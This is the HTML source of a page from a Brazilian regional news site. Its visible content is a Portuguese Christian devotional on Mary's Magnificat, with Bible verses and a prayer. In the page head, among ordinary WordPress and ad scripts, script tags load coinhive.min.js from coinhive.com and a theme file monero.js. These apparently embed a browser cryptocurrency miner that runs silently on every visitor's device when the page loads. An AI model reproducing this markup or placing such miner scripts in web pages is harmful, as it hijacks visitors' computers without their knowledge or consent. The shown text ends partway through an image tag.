

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://oiguassu.com/xmlrpc.php" />

	<!-- Meta Tag Manager -->
	<meta name="google-site-verification" content="9D5X4zGUYK9T8sBJcfFZt-zekBWN3kbyAXq7V-YRTEQ" />
	<!-- / Meta Tag Manager -->

	<!-- This site is optimized with the Yoast SEO plugin v14.9 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>MARIA, MÃE DE JESUS - O Iguassu</title>
	<meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
	<link rel="canonical" href="http://oiguassu.com/maria-mae-de-jesus/" />
	<meta property="og:locale" content="pt_BR" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="MARIA, MÃE DE JESUS - O Iguassu" />
	<meta property="og:description" content="Reflita e seja grato pela bondade e pelas bênçãos de..." />
	<meta property="og:url" content="http://oiguassu.com/maria-mae-de-jesus/" />
	<meta property="og:site_name" content="O Iguassu" />
	<meta property="article:published_time" content="2020-12-18T08:43:35+00:00" />
	<meta property="article:modified_time" content="2020-12-18T08:49:55+00:00" />
	<meta property="og:image" content="https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1.jpg" />
	<meta property="og:image:width" content="777" />
	<meta property="og:image:height" content="437" />
	<meta name="twitter:card" content="summary_large_image" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://oiguassu.com/#website","url":"https://oiguassu.com/","name":"Oiguassu","description":"Not&iacute;cias para a Tr&iacute;plice Fronteira","potentialAction":[{"@type":"SearchAction","target":"https://oiguassu.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","@id":"http://oiguassu.com/maria-mae-de-jesus/#primaryimage","inLanguage":"pt-BR","url":"https://oiguassu.com/wp-content/uploads/2020/09/espa\u00e7o-crist\u00e3o-4-777x437-1.jpg","width":777,"height":437},{"@type":"WebPage","@id":"http://oiguassu.com/maria-mae-de-jesus/#webpage","url":"http://oiguassu.com/maria-mae-de-jesus/","name":"MARIA, M\u00c3E DE JESUS - O Iguassu","isPartOf":{"@id":"https://oiguassu.com/#website"},"primaryImageOfPage":{"@id":"http://oiguassu.com/maria-mae-de-jesus/#primaryimage"},"datePublished":"2020-12-18T08:43:35+00:00","dateModified":"2020-12-18T08:49:55+00:00","author":{"@id":"https://oiguassu.com/#/schema/person/b303a9f3786161d4cd44ba8f8b816b9d"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["http://oiguassu.com/maria-mae-de-jesus/"]}]},{"@type":"Person","@id":"https://oiguassu.com/#/schema/person/b303a9f3786161d4cd44ba8f8b816b9d","name":"Administrador","image":{"@type":"ImageObject","@id":"https://oiguassu.com/#personlogo","inLanguage":"pt-BR","url":"https://secure.gravatar.com/avatar/998a033fd26aa96a4b77b790039481ea?s=96&d=mm&r=g","caption":"Administrador"}}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para O Iguassu &raquo;" href="https://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para O Iguassu &raquo;" href="https://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para O Iguassu &raquo; MARIA, MÃE DE JESUS" href="https://oiguassu.com/maria-mae-de-jesus/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.6"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://oiguassu.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=1599656572' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<style id='global-styles-inline-css' type='text/css'>
:root {
	--wp--preset--color--black: #000000;
	--wp--preset--color--cyan-bluish-gray: #abb8c3;
	--wp--preset--color--light-green-cyan: #7bdcb5;
	--wp--preset--color--luminous-vivid-amber: #fcb900;
	--wp--preset--color--luminous-vivid-orange: #ff6900;
	--wp--preset--color--pale-cyan-blue: #8ed1fc;
	--wp--preset--color--pale-pink: #f78da7;
	--wp--preset--color--vivid-cyan-blue: #0693e3;
	--wp--preset--color--vivid-green-cyan: #00d084;
	--wp--preset--color--vivid-purple: #9b51e0;
	--wp--preset--color--vivid-red: #cf2e2e;
	--wp--preset--color--white: #ffffff;
	--wp--preset--font-size--small: 13;
	--wp--preset--font-size--normal: 16;
	--wp--preset--font-size--medium: 20;
	--wp--preset--font-size--large: 36;
	--wp--preset--font-size--huge: 48;
	--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);
	--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);
	--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);
	--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);
	--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);
	--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);
	--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);
	--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);
	--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);
	--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);
	--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);
	--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);
}

</style>
<link rel='stylesheet' id='mh-style-css'  href='https://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='https://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=8.9.1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=8.9.1' type='text/css' media='all' />
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1' id='jquery-core-js'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' id='jetpack_related-posts-js-extra'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20191011' id='jetpack_related-posts-js'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=5.6' id='mh-scripts-js'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=5.6' id='monero-js'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=5.6' id='monero2-js'></script>
<link rel="https://api.w.org/" href="https://oiguassu.com/wp-json/" /><link rel="alternate" type="application/json" href="https://oiguassu.com/wp-json/wp/v2/posts/27363" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.6" />
<link rel='shortlink' href='https://wp.me/pS5BS-77l' />
<link rel="alternate" type="application/json+oembed" href="https://oiguassu.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Foiguassu.com%2Fmaria-mae-de-jesus%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://oiguassu.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Foiguassu.com%2Fmaria-mae-de-jesus%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="https://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><link rel="amphtml" href="https://oiguassu.com/maria-mae-de-jesus/amp/"><link rel="icon" href="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-270x270.png" />
			<style type="text/css" id="wp-custom-css">
				.logo-wrap img{
	width:100%
}			</style>
		</head>
<body class="post-template-default single single-post postid-27363 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="https://oiguassu.com/" title="O Iguassu" rel="home">
<div class="logo-wrap" role="banner">
<img src="https://oiguassu.com/wp-content/uploads/2020/08/cropped-O-IGUASSU-Cartão-Front-1064-x-451-v2.jpg" height="338" width="1064" alt="O Iguassu" />
<div class="logo">
<h1 class="logo-title">O Iguassu</h1>
<h2 class="logo-tagline">Not&iacute;cias para a Tr&iacute;plice Fronteira</h2>
</div>
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="https://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="https://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-93"><a href="https://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="https://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="https://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="https://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-97"><a href="https://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/uma-carta-de-natal/" title="UMA CARTA DE NATAL">
					<span class="ticker-item-date">dezembro 20, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">UMA CARTA DE NATAL</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/fronteira-pcpr-tem-7121-de-elucidacao-de-homicidios-em-foz-do-iguacu/" title="Fronteira: PCPR tem 71,21% de elucidação de homicídios em Foz do Iguaçu">
					<span class="ticker-item-date">dezembro 19, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Fronteira: PCPR tem 71,21% de elucidação de homicídios em Foz do Iguaçu</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/triplice-fronteira-governo-paraguaio-quer-continuidade-da-abertura-da-ponte-da-amizade/" title="Tríplice Fronteira: GOVERNO PARAGUAIO QUER CONTINUIDADE DA &#8220;ABERTURA&#8221; DA PONTE DA AMIZADE">
					<span class="ticker-item-date">dezembro 19, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Tríplice Fronteira: GOVERNO PARAGUAIO QUER CONTINUIDADE DA &#8220;ABERTURA&#8221; DA PONTE DA AMIZADE</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/foz-do-iguacu-ministerio-publico-move-duas-novas-acoes-contra-reni/" title="Foz do Iguaçu: MINISTÉRIO PÚBLICO MOVE DUAS NOVAS AÇÕES CONTRA RENI">
					<span class="ticker-item-date">dezembro 19, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Foz do Iguaçu: MINISTÉRIO PÚBLICO MOVE DUAS NOVAS AÇÕES CONTRA RENI</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/deus-e-pai-e-deseja-nosso-bem/" title="DEUS É PAI, E DESEJA NOSSO BEM!">
					<span class="ticker-item-date">dezembro 19, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">DEUS É PAI, E DESEJA NOSSO BEM!</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/terra-das-catarata-o-que-reserva-2021-para-o-futuro-da-terra-das-cataratas/" title="Terra das Cataratas: O QUÊ RESERVA 2021 PARA O FUTURO DA “TERRA DAS CATARATAS”?">
					<span class="ticker-item-date">dezembro 19, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Terra das Cataratas: O QUÊ RESERVA 2021 PARA O FUTURO DA “TERRA DAS CATARATAS”?</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/opiniao-nao-se-iludam-dias-piores-virao/" title="Opinião &#8211; NÃO SE ILUDAM, DIAS PIORES VIRÃO">
					<span class="ticker-item-date">dezembro 18, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Opinião &#8211; NÃO SE ILUDAM, DIAS PIORES VIRÃO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/maria-mae-de-jesus/" title="MARIA, MÃE DE JESUS">
					<span class="ticker-item-date">dezembro 18, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">MARIA, MÃE DE JESUS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/pandemia-argentina-tendra-la-vacuna-sputnik-v-para-navidad/" title="Pandemia: ARGENTINA TENDRÁ LA VACUNA SPUTNIK V PARA NAVIDAD">
					<span class="ticker-item-date">dezembro 18, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Pandemia: ARGENTINA TENDRÁ LA VACUNA SPUTNIK V PARA NAVIDAD</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/frontera-gobernador-pide-sinceramiento-al-estado-para-restablecer-comercio-fronterizo/" title="Frontera: GOBERNADOR PIDE SINCERAMIENTO AL ESTADO PARA RESTABLECER COMERCIO FRONTERIZO">
					<span class="ticker-item-date">dezembro 18, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Frontera: GOBERNADOR PIDE SINCERAMIENTO AL ESTADO PARA RESTABLECER COMERCIO FRONTERIZO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/pandemia-pfizer-con-problemas-para-la-aprobacion-de-la-vacuna-en-brasil/" title="Pandemia: PFIZER, CON PROBLEMAS PARA LA APROBACIÓN DE LA VACUNA EN BRASIL">
					<span class="ticker-item-date">dezembro 18, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Pandemia: PFIZER, CON PROBLEMAS PARA LA APROBACIÓN DE LA VACUNA EN BRASIL</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/pandemia-lote-com-mais-2-milhoes-de-doses-da-coronavac-chega-ao-brasil/" title="Pandemia: LOTE COM MAIS 2 MILHÕES DE DOSES DA CORONAVAC CHEGA AO BRASIL">
					<span class="ticker-item-date">dezembro 18, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Pandemia: LOTE COM MAIS 2 MILHÕES DE DOSES DA CORONAVAC CHEGA AO BRASIL</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/foz-do-iguacu-nomeacoes-de-assessores-em-recesso-parlamentar-podem-custar-gasto-de-mais-de-r-12-milhao-aos-contribuintes/" title="Foz do Iguaçu: NOMEAÇÕES DE ASSESSORES EM RECESSO PARLAMENTAR PODEM CUSTAR GASTO DE MAIS DE R$ 1,2 MILHÃO AOS CONTRIBUINTES">
					<span class="ticker-item-date">dezembro 17, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Foz do Iguaçu: NOMEAÇÕES DE ASSESSORES EM RECESSO PARLAMENTAR PODEM CUSTAR GASTO DE MAIS DE R$ 1,2 MILHÃO AOS CONTRIBUINTES</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/foz-do-iguacu-nomeacao-aponta-para-mais-do-mesmo-em-2021/" title="Foz do Iguaçu: NOMEAÇÃO APONTA PARA MAIS DO MESMO EM 2021">
					<span class="ticker-item-date">dezembro 17, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Foz do Iguaçu: NOMEAÇÃO APONTA PARA MAIS DO MESMO EM 2021</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="https://oiguassu.com/deus-do-impossivel/" title="DEUS DO IMPOSSÍVEL">
					<span class="ticker-item-date">dezembro 17, 2020</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">DEUS DO IMPOSSÍVEL</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="https://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <a href="https://oiguassu.com/category/colunas/">Colunas</a> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://oiguassu.com/category/colunas/espaco-cristao-colunas/" itemprop="url"><span itemprop="title">Espaço Cristão</span></a></span></nav>
<article id="post-27363" class="post-27363 post type-post status-publish format-standard has-post-thumbnail hentry category-espaco-cristao-colunas">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			MARIA, MÃE DE JESUS		</h1>
			</header>
	
<div class="entry-thumbnail">
<img width="777" height="437" src="https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1-777x437.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" loading="lazy" srcset="https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1.jpg 777w, https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1-300x169.jpg 300w, https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1-768x432.jpg 768w, https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1-180x101.jpg 180w, https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1-260x146.jpg 260w, https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1-373x210.jpg 373w, https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1-120x67.jpg 120w" sizes="(max-width: 777px) 100vw, 777px" data-attachment-id="24909" data-permalink="https://oiguassu.com/escrito-em-suas-maos/espaco-cristao-4-777x437/" data-orig-file="https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1.jpg" data-orig-size="777,437" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="espaço cristão -4-777&#215;437" data-image-description="" data-medium-file="https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1-300x169.jpg" data-large-file="https://oiguassu.com/wp-content/uploads/2020/09/espaço-cristão-4-777x437-1.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="https://oiguassu.com/author/administrador/">Administrador</a></span>
<span class="entry-meta-date updated">dezembro 18, 2020</span>
</p>
	<div class="entry-content clearfix">
		<!--CusAdsVi1--><p style="text-align: justify;">
<h3 style="text-align: justify;"><strong>Reflita e seja grato pela bondade e pelas bênçãos de Deus neste ano que passou!</strong></h3>
<p style="text-align: justify;">
<h4 style="text-align: justify;"><strong>Versículo do dia: </strong><em>&#8220;Minha alma exalta ao Senhor! Como meu espírito se alegra em Deus, meu Salvador&#8221; </em></h4>
<h5 style="text-align: justify;">(Lucas 1:46,47)</h5>
<p style="text-align: justify;">
<p style="text-align: justify;">Sentado no pátio da Igreja da Visitação em Ein Karem, Israel, impressionou-me a exibição de 67 mosaicos do Magnificat, do latim “magnificar”, escritos em tantas línguas. Esses versos expressam a alegre resposta de Maria ao anúncio de que ela fora escolhida para ser a mãe do Messias.</p>
<p style="text-align: justify;">
<p style="text-align: justify;">Cada placa contém as palavras de Maria, incluindo: <strong><em>“Minha alma glorifica o Senhor e meu espírito se alegra em Deus meu Salvador […]. Pois o Poderoso é santo e fez grandes coisas por mim”</em></strong> (Lucas 1:46-49). O hino bíblico gravado nos azulejos é uma canção de louvor na qual Maria relata a fidelidade de Deus a ela e à nação de Israel.</p>
<p style="text-align: justify;">
<p style="text-align: justify;">Maria está grata por ter sido agraciada por Deus e se alegra em Sua salvação (Lucas 1:47). Ela reconhece que a misericórdia de Deus se estendeu aos israelitas <em>“geração após geração”</em> (Lucas 1:50).</p>
<p style="text-align: justify;">
<p style="text-align: justify;">Ao refletir sobre o cuidado de Deus pelos israelitas, no passado, Maria louva a Deus por Seus atos poderosos em favor do Seu povo (Lucas 1:51). Ela também lhe agradece reconhecendo que a sua provisão diária vem da mão do Senhor (Lucas 1:53).</p>
<p style="text-align: justify;">
<p style="text-align: justify;"><strong>Maria nos mostra que relembrar as grandes coisas que Deus fez por nós é uma maneira de expressar louvor e pode nos trazer alegria.</strong> Nesta época de Natal, reflita sobre a bondade de Deus. Dessa maneira, você pode criar um mosaico de grande beleza com as suas palavras de louvor a Ele.</p>
<p style="text-align: justify;">
<h4 style="text-align: justify;"><strong>OREMOS:</strong> Senhor Jesus, quero agradecer pela Tua presença e proteção. Ensina-me a viver segundo a sua Palavra, ajuda-me a crescer. Quero aprender mais e mais de Ti. Em nome de Jesus, amém.</h4>
<p style="text-align: justify;">
<h6 style="text-align: right;">(Com Lisa M. Samra)</h6>
<p style="text-align: justify;">
<p><a href="http://oiguassu.com/wp-content/uploads/2020/09/peixe-2.jpg"><img data-attachment-id="24910" data-permalink="https://oiguassu.com/escrito-em-suas-maos/peixe-2/" data-orig-file="https://oiguassu.com/wp-content/uploads/2020/09/peixe-2.jpg" data-orig-size="300,240" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="peixe -2" data-image-description="" data-medium-file="https://oiguassu.com/wp-content/uploads/2020/09/peixe-2.jpg" data-large-file="https://oiguassu.com/wp-content/uploads/2020/09/peixe-2.jpg" loading="lazy" class="size-full wp-image-24910 aligncenter" 